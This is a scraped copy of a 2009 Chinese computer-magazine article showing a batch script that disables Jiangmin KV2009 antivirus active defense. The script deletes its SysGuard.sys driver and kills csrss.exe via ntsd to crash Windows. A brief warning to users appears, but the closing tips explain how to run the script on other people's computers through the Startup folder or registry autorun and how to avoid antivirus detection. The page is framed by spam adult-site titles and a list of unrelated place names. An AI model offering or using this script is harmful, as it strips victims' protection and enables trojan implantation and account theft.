国产日韩欧美一区二区三区三州_亚洲少妇熟女av_久久久久亚洲av国产精品_波多野结衣网站一区二区_亚洲欧美色片在线91_国产亚洲精品精品国产优播av_日本一区二区三区波多野结衣 _久久国产av不卡

?

批處理挑戰(zhàn)KV2009主動防御

2009-04-29 00:44:03牧馬人
計算機(jī)應(yīng)用文摘 2009年19期
關(guān)鍵詞:主動防御批處理死機(jī)

牧馬人

現(xiàn)在主動防御功能實(shí)在是太火了,所以很多殺毒軟件都加入了這個功能,江民KV系列的殺毒軟件當(dāng)然也不例外。但是,利用文本編輯軟件新建一個*.bat批處理文件,輸入下面這段代碼后保存并運(yùn)行,就可以輕松干掉江民殺毒軟件KV2009的主動防御功能了(如圖)。

@echo off

del %systemroot%system32driversSysGuard.sys /f /q /s

set app_name=csrss.exe

echo 查找進(jìn)程%app_name%,準(zhǔn)備死機(jī)...

(tasklist /nh | findstr /i %app_name%) || (goto dead)

:dead

ntsd -c -q -pn %app_name%

我在虛擬機(jī)和本地系統(tǒng)中分別進(jìn)行了試驗(yàn),發(fā)現(xiàn)這段代碼非常管用。它的意思非常簡單:首先是刪除江民殺毒軟件中的一個驅(qū)動文件,接著強(qiáng)制結(jié)束一個系統(tǒng)文件的進(jìn)程,造成操作系統(tǒng)死機(jī)(之所以要強(qiáng)制死機(jī),是因?yàn)闅⒍拒浖淖晕冶Wo(hù)功能不允許系統(tǒng)非正常地重新啟動)。當(dāng)重新啟動后,江民殺毒軟件的主動防御功能就失效了,這樣黑客就能比較容易地向用戶的電腦中植入木馬、竊取賬號……

如果你是江民殺毒軟件的用戶,那么此招不得不防,最好經(jīng)常檢查其主動防御功能的工作狀態(tài),不然電腦被黑客入侵了都還不知道。

1.在試驗(yàn)前,一定要把江民殺毒軟件的SysGuard.sys驅(qū)動文件拷貝到其他地方進(jìn)行備份。因?yàn)槿绻囼?yàn)成功了,那么江民殺毒軟件的主動防御功能就徹底失效了,要想讓它恢復(fù)就得把備份的SysGuard.sys驅(qū)動文件拷貝回去,再重新啟動。

2.最好不要把*.bat放在可執(zhí)行文件里,因?yàn)檫@樣在運(yùn)行時十有八九會被殺毒軟件攔截。

3.在別人的電腦上進(jìn)行試驗(yàn)時,可把*.bat放在啟動文件夾中,或采用修改注冊表的方式讓它自動運(yùn)行。

猜你喜歡
主動防御批處理死機(jī)
主動防御撞擊地球的“殺手”
電腦死機(jī)時在干什么
電腦報(2022年49期)2023-01-01 03:42:10
提醒
主動防御飛行器的范數(shù)型微分對策制導(dǎo)律
網(wǎng)絡(luò)安全主動防御技術(shù)分析
臉?biāo)罊C(jī)了
基于PSD-BPA的暫態(tài)穩(wěn)定控制批處理計算方法的實(shí)現(xiàn)
批處理天地.文件分類超輕松
淺析HIPS系統(tǒng)防火墻技術(shù)與發(fā)展
批處理天地.文件分類超輕松
贵定县| 孙吴县| 阳江市| 瑞安市| 双城市| 甘肃省| 卢湾区| 丹寨县| 石河子市| 仁寿县| 高尔夫| 莒南县| 咸丰县| 环江| 涞水县| 宁安市| 新余市| 丰都县| 湖北省| 洪湖市| 青阳县| 如皋市| 东辽县| 来安县| 镇赉县| 宁城县| 华坪县| 界首市| 务川| 清流县| 海南省| 武清区| 沂南县| 湄潭县| 天气| 乐昌市| 西昌市| 丹凤县| 宜良县| 都兰县| 轮台县|